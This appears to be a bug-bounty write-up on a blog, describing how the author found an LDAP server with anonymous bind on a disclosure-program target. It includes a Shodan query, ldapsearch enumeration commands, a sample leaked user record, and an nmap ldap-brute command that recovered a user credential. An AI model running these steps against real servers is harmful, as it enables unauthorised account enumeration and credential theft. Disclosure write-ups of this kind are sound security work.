How to Takover a ldap server.

Ashish Kunwar
Oct 25 · 2 min read

Intro

LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. — read here

I Chose a random paying target REDACTED.com running a Responsible Disclosure.

As Usual i started my personal tool “BREXET” and it gathered lots of subdomains and ran nmap over every subdomain , i went through the output and found this interesting port 389 with anonymous bind enabled.

can be found using shodan , use shodan query — ssl:target Port:”389"

Anonymous LDAP Binding allows a client to connect and search the directory (bind and search) without logging in. You do not need to include binddn and bindpasswd.

Now, we can try searching for the base by using a ldap search query.

ldapsearch -h <TARGET IP> 389 -x -s base -b ‘’ “(objectClass=*)” “*” +

this is just small glimpse how it would look like.

now , take a note of naming context/base ,with this we can enum ldap users and their access details and uids , etc

defaultnamingcontext: dc=xxx,dc=xxx,dc=xx

we are gonna use this command.

ldapsearch -h <TARGET IP> -p 389 -x -b “dc=xxx,dc=xxx,dc=xx”

now there were lots of users and here’s how their ldap detail look like

# aab, users, compat, doman_name
dn: uid=aab,cn=users,cn=compat,dc=xxx,dc=xxx,dc=xx
objectClass: posixAccount
objectClass: ipaOverrideTarget
objectClass: top
gecos: name_here
cn: name_here
uidNumber: 1019XXXXXXX
gidNumber: 1019XXXXXXX
loginShell: /bin/bash
homeDirectory: /home/aab
ipaAnchorUUID:: xxxxxxxxx
uid: aab

now with this as a attacker i can try bruteforcing passwords or can check for usernames and password with a default list using nmap

nmap -p 389 — script ldap-brute — script-args ldap.base=’”dc=xxx,dc=xxxx,dc=xx”’ <target ip>

#Note: You can use jxplorer to do the same , just connect to the port using it .

#Note: do nmap scan on all subs if the target scope is big.

with this i got lucky and got a ldap user cred (thanks to nmap)

once you get access use jxplorer to play around .

after reporting it , i earned good bounty.

#if you have any question just DM on my twitter.

Ashish Kunwar

Written by

i m a security researcher and exploit developer/ and love Fuzzing and break things |bug hunter| at |bugcrowd|&|hackerone(0x01)|

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade